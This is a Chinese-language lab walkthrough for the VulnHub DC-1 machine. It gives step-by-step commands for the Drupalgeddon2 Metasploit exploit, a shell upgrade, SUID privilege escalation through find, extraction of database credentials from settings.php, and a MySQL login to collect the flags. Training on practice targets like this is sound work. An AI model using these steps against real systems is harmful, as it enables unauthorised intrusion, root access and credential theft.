核心思路信息收集 → Drupal 远程代码执行 → 拿 Webshell → 数据库信息利用 → SUID 提权 → 拿 Root 与全部 Flag一、环境准备攻击机Kali LinuxNAT 模式靶机DC‑1VulnHub 下载NAT 模式目标拿下root 权限 找到5 个 flag二、信息收集定位靶机 端口服务1. 查看攻击机 IPifconfig2. 网段扫描找靶机 IParp-scan -l3. 端口与服务扫描nmap -A -T4 192.168.146.133开放端口22/tcp SSH80/tcp HTTPDrupal 7 CMS111/tcp rpcbind关键发现80 端口跑 Drupal 7存在 CVE‑2018‑7600Drupalgeddon2远程代码执行漏洞三、漏洞利用MSF 拿 Shell1. 启动 Metasploitmsfconsole2. 搜索并加载漏洞模块search drupal # 选择第1个exploit/unix/webapp/drupal_drupalgeddon2 use 13. 设置参数并执行1. set rhosts 192.168.146.128 # 靶机IP 2. set lhost 192.168.46.133 # 攻击机IP 3. run成功拿到Meterpreter 会话用户为www‑data低权限四、升级交互式 Shell1. shell 2. python -c import pty;pty.spawn(/bin/bash)得到稳定 bashwww-dataDC-1:/var/www$(这行命令是在渗透测试中把一个 “残缺的反向 Shell 升级成交互式 Bash” 的经典操作) 为什么要这么做你刚拿到的 Meterpreter / 反弹 Shell 有很多限制无法使用su/sudo切换用户无法运行vim/top这类需要终端的程序输入错误命令时CtrlC会直接把整个会话关掉没有命令行历史记录、Tab 补全执行这行命令后你会得到一个稳定的交互式 Shell能正常使用这些功能后面提权、操作靶机都会顺畅很多。五、SUID 提权获取 root 权限查找带 SUID 权限的可执行文件find / -perm -us -type f 2/dev/null关键发现/usr/bin/find带有 SUID 权限可用于提权。利用 find 命令提权# 创建临时文件 touch test.txt # 利用find执行/bin/sh获取root shell find . -name test.txt -exec /bin/sh \; # 验证权限 whoami输出root即提权成功终端提示符变为#。六、一次性获取全部 5 个 FlagFlag 1Web 根目录cd /var/www ls cat flag1.txtFlag 2Drupal 配置文件# 进入配置文件目录 cd /var/www/sites/default/ # 精准查看数据库信息和flag2 grep -E database|username|password|flag settings.php文件中包含数据库账号密码以及 Flag2 内容。关键信息数据库名drupaldb用户名dbuser密码R0ck3t直接输出 flag2 内容Flag 3MySQL 数据库登录数据库mysql -u dbuser -pR0ck3t drupaldb查看 users 表内容获取 flag3-- 查看所有表 show tables; -- 查看users表的完整内容按行显示方便阅读 select * from users\G输出内容中包含 flag3 的提示信息。退出数据库exitFlag 4普通用户目录cat /home/flag4/flag4.txt直接读取 flag4 内容。Flag 5Root 目录最终 Flagcat /root/thefinalflag.txt获取最终通关 Flag内容为 DC-1 的通关祝贺信息。